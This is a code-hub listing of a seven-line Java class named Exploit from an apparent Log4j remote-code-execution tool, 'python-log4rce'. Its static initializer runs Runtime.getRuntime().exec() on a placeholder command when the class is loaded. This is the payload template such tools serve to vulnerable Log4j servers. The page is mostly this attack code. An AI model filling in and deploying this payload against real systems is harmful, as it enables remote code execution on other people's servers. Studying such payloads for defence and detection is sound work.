Code
Hub
Workspaces
Following
Trending
Connect
MCP
copy
Create free account
hub
/
github.com/alexandre-lavoie/python-log4rce
/ Exploit
Class
Exploit
java/Exploit.java:1–7 ·
view source on GitHub ↗
Source
from the content-addressed store, hash-verified
1
public
class
Exploit {
2
static
{
3
try {
4
Runtime.getRuntime().exec(
"###"
);
5
} catch(Exception e) {}
6
}
7
}
Callers
nothing calls this directly
Calls
no outgoing calls
Tested by
no test coverage detected